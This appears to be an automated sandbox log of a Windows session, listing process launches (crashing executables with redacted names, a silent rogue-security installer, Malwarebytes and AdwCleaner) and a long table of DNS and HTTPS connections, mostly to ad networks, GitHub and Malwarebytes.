"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15264273918660016593,13903908438665742222,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5768 /prefetch:2

C:\Users\Admin\Documents\[email protected]

"C:\Users\Admin\Documents\[email protected]"

C:\Users\Admin\Documents\[email protected]

"C:\Users\Admin\Documents\[email protected]"

C:\Users\Admin\Documents\[email protected]

"C:\Users\Admin\Documents\[email protected]"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2172 -ip 2172

C:\Users\Admin\Documents\[email protected]

C:\Users\Admin\Documents\[email protected]

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 480

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi"

C:\Program Files (x86)\Security Central\Security Central.exe

"C:\Program Files (x86)\Security Central\Security Central.exe"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Program Files (x86)\Security Central\Security Central.exe

"C:\Program Files (x86)\Security Central\Security Central.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\explorer.exe

explorer.exe /LOADSAVEDWINDOWS

C:\Windows\system32\sihost.exe

sihost.exe

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\explorer.exe

explorer.exe /LOADSAVEDWINDOWS

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\explorer.exe

explorer.exe /LOADSAVEDWINDOWS

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\explorer.exe

explorer.exe /LOADSAVEDWINDOWS

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 69979813E7C02FD336707CFA73C8ED85 E Global\MSI0000

C:\Windows\explorer.exe

explorer.exe /LOADSAVEDWINDOWS

C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe

"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"

C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe

"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"

C:\Users\Admin\Desktop\[email protected]

"C:\Users\Admin\Desktop\[email protected]"

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"

C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe

"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"

C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe

"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"

C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe

"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"

C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe

"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\mspaint.exe

"C:\Windows\system32\mspaint.exe" "C:\Users\Public\Desktop\@[email protected]"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService

C:\Program Files (x86)\Security Central\Security Central.exe

"C:\Program Files (x86)\Security Central\Security Central.exe"

C:\Program Files (x86)\Security Central\Security Central.exe

"C:\Program Files (x86)\Security Central\Security Central.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\SysWOW64\werfault.exe

werfault.exe /h /shared Global\096856908cd3419d9d9501e5eeded7dd /t 6464 /p 6460

C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe

"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"

C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe

"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.180.14:443 www.youtube.com tcp
GB 142.250.180.14:443 www.youtube.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 142.250.200.42:443 content-autofill.googleapis.com tcp
GB 142.250.180.14:443 www.youtube.com udp
US 8.8.8.8:53 14.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 3.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 42.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 137.126.19.2.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 download.com udp
US 34.149.2.250:443 download.com tcp
US 34.149.2.250:443 download.com tcp
US 8.8.8.8:53 download.cnet.com udp
US 151.101.1.91:443 download.cnet.com tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
US 8.8.8.8:53 250.2.149.34.in-addr.arpa udp
US 8.8.8.8:53 91.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 205.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 at.adtech.redventures.io udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 cdn.cookielaw.org udp
US 8.8.8.8:53 cdn.cohesionapps.com udp
GB 172.217.169.34:443 securepubads.g.doubleclick.net tcp
US 151.101.2.154:443 at.adtech.redventures.io tcp
US 151.101.1.91:443 download.cnet.com udp
US 104.19.177.52:443 cdn.cookielaw.org tcp
ES 18.172.213.84:443 cdn.cohesionapps.com tcp
GB 172.217.169.34:443 securepubads.g.doubleclick.net udp
US 104.19.177.52:443 cdn.cookielaw.org tcp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 34.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 154.2.101.151.in-addr.arpa udp
US 8.8.8.8:53 232.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 ingest.make.rvapps.io udp
US 8.8.8.8:53 52.177.19.104.in-addr.arpa udp
US 8.8.8.8:53 84.213.172.18.in-addr.arpa udp
US 8.8.8.8:53 29.213.172.18.in-addr.arpa udp
US 54.157.160.138:443 ingest.make.rvapps.io tcp
US 54.157.160.138:443 ingest.make.rvapps.io tcp
US 8.8.8.8:53 cdn.confiant-integrations.net udp
US 151.101.2.154:443 at.adtech.redventures.io tcp
US 104.18.43.90:443 cdn.confiant-integrations.net tcp
US 54.157.160.138:443 ingest.make.rvapps.io tcp
US 104.18.43.90:443 cdn.confiant-integrations.net udp
US 8.8.8.8:53 geolocation.onetrust.com udp
US 104.18.32.137:443 geolocation.onetrust.com tcp
US 8.8.8.8:53 spn-v1.revampcdn.com udp
US 151.101.1.91:443 spn-v1.revampcdn.com tcp
US 8.8.8.8:53 138.160.157.54.in-addr.arpa udp
US 8.8.8.8:53 90.43.18.104.in-addr.arpa udp
US 8.8.8.8:53 137.32.18.104.in-addr.arpa udp
US 8.8.8.8:53 z.moatads.com udp
US 8.8.8.8:53 sb.scorecardresearch.com udp
US 8.8.8.8:53 download-bender.cnetstatic.com udp
GB 142.250.200.42:443 content-autofill.googleapis.com udp
GB 96.16.109.251:443 z.moatads.com tcp
ES 18.172.213.48:443 sb.scorecardresearch.com tcp
US 199.232.194.154:443 download-bender.cnetstatic.com tcp
US 199.232.194.154:443 download-bender.cnetstatic.com tcp
US 199.232.194.154:443 download-bender.cnetstatic.com tcp
US 199.232.194.154:443 download-bender.cnetstatic.com tcp
US 199.232.194.154:443 download-bender.cnetstatic.com tcp
US 199.232.194.154:443 download-bender.cnetstatic.com tcp
US 8.8.8.8:53 www.datadoghq-browser-agent.com udp
US 8.8.8.8:53 c.amazon-adsystem.com udp
US 8.8.8.8:53 www.google.com udp
ES 18.172.211.19:443 www.datadoghq-browser-agent.com tcp
GB 142.250.178.4:443 www.google.com udp
GB 96.16.109.251:443 z.moatads.com tcp
US 8.8.8.8:53 apps.cpi.arturito.cloud udp
ES 18.172.208.75:443 c.amazon-adsystem.com tcp
US 8.8.8.8:53 o348491.ingest.sentry.io udp
US 34.120.186.113:443 apps.cpi.arturito.cloud tcp
US 34.120.195.249:443 o348491.ingest.sentry.io tcp
GB 142.250.178.4:443 www.google.com tcp
US 8.8.8.8:53 www.adsensecustomsearchads.com udp
GB 142.250.178.14:443 www.adsensecustomsearchads.com tcp
US 8.8.8.8:53 4.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 48.213.172.18.in-addr.arpa udp
US 8.8.8.8:53 154.194.232.199.in-addr.arpa udp
US 8.8.8.8:53 19.211.172.18.in-addr.arpa udp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 75.208.172.18.in-addr.arpa udp
US 8.8.8.8:53 113.186.120.34.in-addr.arpa udp
US 8.8.8.8:53 249.195.120.34.in-addr.arpa udp
US 8.8.8.8:53 251.109.16.96.in-addr.arpa udp
US 8.8.8.8:53 config.aps.amazon-adsystem.com udp
ES 18.172.208.75:443 c.amazon-adsystem.com tcp
US 8.8.8.8:53 images.sftcdn.net udp
ES 18.172.226.117:443 config.aps.amazon-adsystem.com tcp
GB 104.103.241.197:443 images.sftcdn.net tcp
GB 104.103.241.197:443 images.sftcdn.net tcp
GB 104.103.241.197:443 images.sftcdn.net tcp
GB 104.103.241.197:443 images.sftcdn.net tcp
GB 104.103.241.197:443 images.sftcdn.net tcp
US 8.8.8.8:53 cdn.id5-sync.com udp
ES 18.172.226.117:443 config.aps.amazon-adsystem.com tcp
GB 104.103.241.197:443 images.sftcdn.net tcp
US 8.8.8.8:53 mb.moatads.com udp
GB 130.162.160.243:443 mb.moatads.com tcp
GB 130.162.160.243:443 mb.moatads.com tcp
GB 130.162.160.243:443 mb.moatads.com tcp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 117.226.172.18.in-addr.arpa udp
US 8.8.8.8:53 197.241.103.104.in-addr.arpa udp
US 8.8.8.8:53 243.160.162.130.in-addr.arpa udp
US 104.22.53.86:443 cdn.id5-sync.com tcp
US 8.8.8.8:53 86.53.22.104.in-addr.arpa udp
US 8.8.8.8:53 aax.amazon-adsystem.com udp
ES 18.172.217.30:443 aax.amazon-adsystem.com tcp
ES 18.172.217.30:443 aax.amazon-adsystem.com tcp
ES 18.172.217.30:443 aax.amazon-adsystem.com tcp
ES 18.172.217.30:443 aax.amazon-adsystem.com tcp
ES 18.172.217.30:443 aax.amazon-adsystem.com tcp
ES 18.172.217.30:443 aax.amazon-adsystem.com tcp
US 8.8.8.8:53 c.go-mpulse.net udp
US 8.8.8.8:53 js-sec.indexww.com udp
US 172.64.149.180:443 js-sec.indexww.com tcp
GB 23.39.224.128:443 c.go-mpulse.net tcp
US 8.8.8.8:53 monarch.cohesionapps.com udp
US 8.8.8.8:53 privacyportal.onetrust.com udp
US 54.173.164.203:443 monarch.cohesionapps.com tcp
US 8.8.8.8:53 partner.googleadservices.com udp
US 104.18.32.137:443 privacyportal.onetrust.com tcp
US 8.8.8.8:53 lb.eu-1-id5-sync.com udp
US 8.8.8.8:53 a001570fdc9f668e558b4a4f2f0df561.safeframe.googlesyndication.com udp
GB 172.217.16.226:443 partner.googleadservices.com tcp
DE 162.19.138.117:443 lb.eu-1-id5-sync.com tcp
US 8.8.8.8:53 30.217.172.18.in-addr.arpa udp
US 8.8.8.8:53 180.149.64.172.in-addr.arpa udp
GB 23.39.224.128:443 c.go-mpulse.net tcp
GB 216.58.204.65:443 a001570fdc9f668e558b4a4f2f0df561.safeframe.googlesyndication.com tcp
US 8.8.8.8:53 tpc.googlesyndication.com udp
US 8.8.8.8:53 match.adsrvr.org udp
US 8.8.8.8:53 id.sv.rkdms.com udp
US 8.8.8.8:53 api.rlcdn.com udp
US 8.8.8.8:53 idx.liadm.com udp
US 8.8.8.8:53 id5-sync.com udp
GB 216.58.212.193:443 tpc.googlesyndication.com tcp
US 52.223.40.198:443 match.adsrvr.org tcp
US 44.216.212.178:443 idx.liadm.com tcp
US 34.120.133.55:443 api.rlcdn.com tcp
DE 162.19.138.83:443 id5-sync.com tcp
DE 162.19.138.83:443 id5-sync.com tcp
US 3.223.64.176:443 id.sv.rkdms.com tcp
GB 23.39.224.128:443 c.go-mpulse.net udp
US 8.8.8.8:53 cdn.ampproject.org udp
GB 142.250.187.193:443 cdn.ampproject.org tcp
GB 142.250.187.193:443 cdn.ampproject.org tcp
GB 142.250.187.193:443 cdn.ampproject.org tcp
GB 142.250.187.193:443 cdn.ampproject.org tcp
GB 142.250.187.193:443 cdn.ampproject.org tcp
GB 216.58.212.193:443 tpc.googlesyndication.com udp
GB 23.39.224.128:443 c.go-mpulse.net tcp
US 8.8.8.8:53 dis.eu.criteo.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
NL 178.250.1.9:443 dis.eu.criteo.com tcp
US 8.8.8.8:53 2.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 226.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 203.164.173.54.in-addr.arpa udp
US 8.8.8.8:53 117.138.19.162.in-addr.arpa udp
US 8.8.8.8:53 65.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 128.224.39.23.in-addr.arpa udp
US 8.8.8.8:53 193.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 55.133.120.34.in-addr.arpa udp
US 8.8.8.8:53 198.40.223.52.in-addr.arpa udp
US 8.8.8.8:53 83.138.19.162.in-addr.arpa udp
US 8.8.8.8:53 178.212.216.44.in-addr.arpa udp
US 8.8.8.8:53 176.64.223.3.in-addr.arpa udp
US 8.8.8.8:53 193.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
US 192.178.49.3:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 216.58.204.66:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 ice.360yield.com udp
IE 63.32.195.109:443 ice.360yield.com tcp
US 8.8.8.8:53 ib.adnxs.com udp
NL 185.89.210.20:443 ib.adnxs.com tcp
US 8.8.8.8:53 9.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.49.178.192.in-addr.arpa udp
US 8.8.8.8:53 66.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 109.195.32.63.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 ce.lijit.com udp
IE 54.154.92.191:443 ce.lijit.com tcp
US 8.8.8.8:53 rtb.gumgum.com udp
IE 54.154.163.59:443 rtb.gumgum.com tcp
US 8.8.8.8:53 02179916.akstat.io udp
GB 173.222.12.168:443 02179916.akstat.io tcp
US 8.8.8.8:53 20.210.89.185.in-addr.arpa udp
US 8.8.8.8:53 191.92.154.54.in-addr.arpa udp
US 8.8.8.8:53 uipglob.semasio.net udp
DK 77.243.51.122:443 uipglob.semasio.net tcp
US 8.8.8.8:53 59.163.154.54.in-addr.arpa udp
US 8.8.8.8:53 168.12.222.173.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 122.51.243.77.in-addr.arpa udp
GB 142.250.200.2:443 cm.g.doubleclick.net tcp
US 8.8.8.8:53 2.200.250.142.in-addr.arpa udp
US 54.157.160.138:443 ingest.make.rvapps.io tcp
GB 173.222.12.168:443 02179916.akstat.io udp
GB 142.250.200.42:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 192.178.49.3:443 beacons.gcp.gvt2.com udp
GB 92.123.128.167:443 www.bing.com tcp
GB 92.123.128.167:443 www.bing.com tcp
US 8.8.8.8:53 167.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 92.123.128.191:443 th.bing.com tcp
GB 92.123.128.191:443 th.bing.com tcp
GB 92.123.128.191:443 th.bing.com tcp
GB 92.123.128.191:443 th.bing.com tcp
US 8.8.8.8:53 191.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 login.microsoftonline.com udp
IE 20.190.159.68:443 login.microsoftonline.com tcp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 aefd.nelreports.net udp
GB 88.221.135.114:443 aefd.nelreports.net tcp
US 8.8.8.8:53 services.bingapis.com udp
US 13.107.5.80:443 services.bingapis.com tcp
GB 88.221.135.114:443 aefd.nelreports.net udp
US 8.8.8.8:53 114.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 80.5.107.13.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 3.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.111.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 154.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 collector.github.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 api.github.com udp
US 140.82.112.22:443 collector.github.com tcp
US 140.82.112.22:443 collector.github.com tcp
DE 140.82.121.6:443 api.github.com tcp
DE 140.82.121.6:443 api.github.com tcp
US 8.8.8.8:53 22.112.82.140.in-addr.arpa udp
US 8.8.8.8:53 6.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
GB 88.221.135.114:443 aefd.nelreports.net udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 codeload.github.com udp
DE 140.82.121.9:443 codeload.github.com tcp
US 8.8.8.8:53 9.121.82.140.in-addr.arpa udp
DE 140.82.121.3:443 github.com tcp
DE 140.82.121.9:443 codeload.github.com tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 api.github.com udp
DE 140.82.121.5:443 api.github.com tcp
US 8.8.8.8:53 5.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 234.17.178.52.in-addr.arpa udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 r.bing.com udp
GB 92.123.128.185:443 th.bing.com tcp
US 8.8.8.8:53 185.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 www.trustedantiviruscompare.com udp
US 174.138.119.38:443 www.trustedantiviruscompare.com tcp
US 174.138.119.38:443 www.trustedantiviruscompare.com tcp
US 8.8.8.8:53 38.119.138.174.in-addr.arpa udp
US 174.138.119.38:443 www.trustedantiviruscompare.com tcp
US 174.138.119.38:443 www.trustedantiviruscompare.com tcp
US 174.138.119.38:443 www.trustedantiviruscompare.com tcp
US 174.138.119.38:443 www.trustedantiviruscompare.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 142.250.178.2:443 googleads.g.doubleclick.net tcp
GB 142.250.178.4:443 www.google.com tcp
US 8.8.8.8:53 2.178.250.142.in-addr.arpa udp
GB 92.123.128.145:443 r.bing.com tcp
US 8.8.8.8:53 145.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 storage.googleapis.com udp
GB 142.250.187.219:443 storage.googleapis.com tcp
GB 142.250.187.219:443 storage.googleapis.com tcp
GB 142.250.187.219:443 storage.googleapis.com udp
US 8.8.8.8:53 prf.hn udp
GB 5.150.170.5:443 prf.hn tcp
GB 5.150.170.5:443 prf.hn tcp
GB 142.250.178.4:443 www.google.com udp
US 8.8.8.8:53 www.malwarebytes.com udp
US 192.0.66.233:443 www.malwarebytes.com tcp
US 8.8.8.8:53 219.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 5.170.150.5.in-addr.arpa udp
US 8.8.8.8:53 233.66.0.192.in-addr.arpa udp
US 8.8.8.8:53 dev.visualwebsiteoptimizer.com udp
US 8.8.8.8:53 stats.wp.com udp
US 8.8.8.8:53 plausible.io udp
US 34.96.102.137:443 dev.visualwebsiteoptimizer.com tcp
GB 143.244.38.136:443 plausible.io tcp
US 192.0.76.3:443 stats.wp.com tcp
US 34.96.102.137:443 dev.visualwebsiteoptimizer.com udp
US 34.96.102.137:443 dev.visualwebsiteoptimizer.com udp
US 8.8.8.8:53 137.102.96.34.in-addr.arpa udp
US 8.8.8.8:53 136.38.244.143.in-addr.arpa udp
US 8.8.8.8:53 3.76.0.192.in-addr.arpa udp
US 34.96.102.137:443 dev.visualwebsiteoptimizer.com tcp
US 104.19.177.52:443 cdn.cookielaw.org tcp
GB 143.244.38.136:443 plausible.io tcp
US 8.8.8.8:53 genesis.malwarebytes.com udp
US 44.206.136.150:443 genesis.malwarebytes.com tcp
US 44.206.136.150:443 genesis.malwarebytes.com tcp
US 8.8.8.8:53 pixel.wp.com udp
US 104.19.177.52:443 cdn.cookielaw.org tcp
US 104.18.32.137:443 privacyportal.onetrust.com tcp
US 8.8.8.8:53 150.136.206.44.in-addr.arpa udp
US 104.18.32.137:443 privacyportal.onetrust.com tcp
US 104.18.32.137:443 privacyportal.onetrust.com tcp
US 8.8.8.8:53 js.driftt.com udp
ES 18.172.213.79:443 js.driftt.com tcp
US 8.8.8.8:53 conversation.api.drift.com udp
US 8.8.8.8:53 customer.api.drift.com udp
US 8.8.8.8:53 metrics.api.drift.com udp
US 8.8.8.8:53 targeting.api.drift.com udp
US 8.8.8.8:53 bootstrap.driftapi.com udp
US 8.8.8.8:53 79.213.172.18.in-addr.arpa udp
ES 18.172.226.121:443 bootstrap.driftapi.com tcp
US 8.8.8.8:53 api.company-target.com udp
ES 18.172.226.97:443 api.company-target.com tcp
US 3.94.218.138:443 targeting.api.drift.com tcp
US 8.8.8.8:53 121.226.172.18.in-addr.arpa udp
US 8.8.8.8:53 97.226.172.18.in-addr.arpa udp
US 8.8.8.8:53 138.218.94.3.in-addr.arpa udp
US 8.8.8.8:53 41.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 71521-21.chat.api.drift.com udp
US 54.80.75.144:443 71521-21.chat.api.drift.com tcp
US 8.8.8.8:53 presence.api.drift.com udp
US 8.8.8.8:53 event.api.drift.com udp
US 54.173.95.250:443 presence.api.drift.com tcp
US 8.8.8.8:53 144.75.80.54.in-addr.arpa udp
US 8.8.8.8:53 250.95.173.54.in-addr.arpa udp
US 34.96.102.137:443 dev.visualwebsiteoptimizer.com udp
US 8.8.8.8:53 api.demandbase.com udp
ES 18.172.226.31:443 api.demandbase.com tcp
US 8.8.8.8:53 31.226.172.18.in-addr.arpa udp
US 8.8.8.8:53 www-api.malwarebytes.com udp
ES 18.172.213.61:443 www-api.malwarebytes.com tcp
ES 18.172.213.61:443 www-api.malwarebytes.com tcp
ES 18.172.213.61:443 www-api.malwarebytes.com tcp
ES 18.172.213.61:443 www-api.malwarebytes.com tcp
US 8.8.8.8:53 61.213.172.18.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 api2.amplitude.com udp
US 54.200.232.79:443 api2.amplitude.com tcp
US 8.8.8.8:53 79.232.200.54.in-addr.arpa udp
US 8.8.8.8:53 ark.mwbsys.com udp
US 44.194.11.111:443 ark.mwbsys.com tcp
US 8.8.8.8:53 cdn.mwbsys.com udp
ES 18.172.226.54:443 cdn.mwbsys.com tcp
US 8.8.8.8:53 111.11.194.44.in-addr.arpa udp
US 8.8.8.8:53 54.226.172.18.in-addr.arpa udp
US 44.194.11.111:443 ark.mwbsys.com tcp
US 8.8.8.8:53 cdn.mwbsys.com udp
ES 18.172.226.54:443 cdn.mwbsys.com tcp
US 44.194.11.111:443 ark.mwbsys.com tcp
US 8.8.8.8:53 cdn.mwbsys.com udp
ES 18.172.226.54:443 cdn.mwbsys.com tcp
US 44.194.11.111:443 ark.mwbsys.com tcp
US 8.8.8.8:53 cdn.mwbsys.com udp
ES 18.172.226.32:443 cdn.mwbsys.com tcp
US 8.8.8.8:53 32.226.172.18.in-addr.arpa udp
US 44.194.11.111:443 ark.mwbsys.com tcp
US 8.8.8.8:53 cdn.mwbsys.com udp
ES 18.172.226.32:443 cdn.mwbsys.com tcp
US 8.8.8.8:53 ipv4.am.i.mullvad.net udp
SE 45.83.223.233:443 ipv4.am.i.mullvad.net tcp
US 8.8.8.8:53 holocron.mwbsys.com udp
US 34.232.165.72:443 holocron.mwbsys.com tcp
US 8.8.8.8:53 233.223.83.45.in-addr.arpa udp
US 34.232.165.72:443 holocron.mwbsys.com tcp
US 8.8.8.8:53 72.165.232.34.in-addr.arpa udp
US 8.8.8.8:53 api2.amplitude.com udp
US 44.228.101.211:443 api2.amplitude.com tcp
US 8.8.8.8:53 211.101.228.44.in-addr.arpa udp
US 54.80.172.95:443 holocron.mwbsys.com tcp
US 8.8.8.8:53 95.172.80.54.in-addr.arpa udp
GB 92.123.128.168:443 www.bing.com tcp
US 8.8.8.8:53 168.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 iris.mwbsys.com udp
US 3.224.108.1:443 iris.mwbsys.com tcp
US 8.8.8.8:53 telemetry.malwarebytes.com udp
US 34.212.246.47:443 telemetry.malwarebytes.com tcp
US 8.8.8.8:53 1.108.224.3.in-addr.arpa udp
US 8.8.8.8:53 47.246.212.34.in-addr.arpa udp
US 8.8.8.8:53 holocron.mwbsys.com udp
US 34.232.165.72:443 holocron.mwbsys.com tcp
US 54.80.172.95:443 holocron.mwbsys.com tcp
US 54.80.172.95:443 holocron.mwbsys.com tcp
US 54.80.172.95:443 holocron.mwbsys.com tcp
US 54.80.172.95:443 holocron.mwbsys.com tcp
US 54.80.172.95:443 holocron.mwbsys.com tcp
US 8.8.8.8:53 crl.comodoca.com udp
US 104.18.38.233:80 crl.comodoca.com tcp
US 172.64.149.23:80 crl.comodoca.com tcp
US 104.18.38.233:80 crl.comodoca.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 92.123.241.137:80 www.microsoft.com tcp
US 8.8.8.8:53 137.241.123.92.in-addr.arpa udp
US 8.8.8.8:53 sirius.mwbsys.com udp
US 3.210.89.77:443 sirius.mwbsys.com tcp
